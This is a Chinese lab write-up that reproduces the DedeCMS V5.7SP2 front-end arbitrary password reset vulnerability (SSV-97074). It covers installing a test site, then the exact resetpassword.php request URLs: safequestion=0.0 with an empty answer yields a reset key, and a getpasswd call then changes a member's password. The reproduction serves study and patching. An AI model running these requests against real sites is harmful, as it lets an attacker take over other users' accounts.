一、漏洞概述
1.漏洞简介
织梦内容管理系统(DedeCms)的前台任意用户密码修改漏洞,被Seebug 漏洞平台[3]收录该漏洞,漏洞编号为 SSV-97074。
2.漏洞限制
1、 只影响前台账户
2、 只能修改未设置安全问题的账户
3.影响版本
DeDeCMSV5.7SP2 正式版(2018-01-09)
二、漏洞复现
1.复现环境
PHP 5.6
DeDeCMSV5.7SP2 正式版(2018-01-09)
2.复现过程及结果
(一)搭建网站,这里用的是phpstudy
注意:DeDeCMSV5.7SP2 里面的文件一定要放在它的根目录下
否则安装DeDeCMS时会出现打不开的情况会出现打不开的情况
(二)安装DeDeCMS
地址栏输入 域名/uploads/install/index.php进入安装页面
如:www.iwantfff.com/uploads/install/index.php
点击继续
数据库的密码在phpstudy查看
如果你做不成功第二次想再做过,就会显示数据库已存在,但是这个不用管,没有影响的。
(三)登录,注册
(1)登陆后台,打开会员功能
(2)注册一个没有安全问题的会员
登录管理员账号,可以看到已经注册好的会员 。
(四)burp抓包
(1)输入
域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2
如:
www.iwantfff.com/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2
抓包得key,这是一会儿修改密码的临时验证码验证码。
(2)修改密码
输入 :域名/member/resetpassword.php?dopost=getpasswd&id=2
如:www.iwantfff.com/member/resetpassword.php?dopost=getpasswd&id=2
修改成功。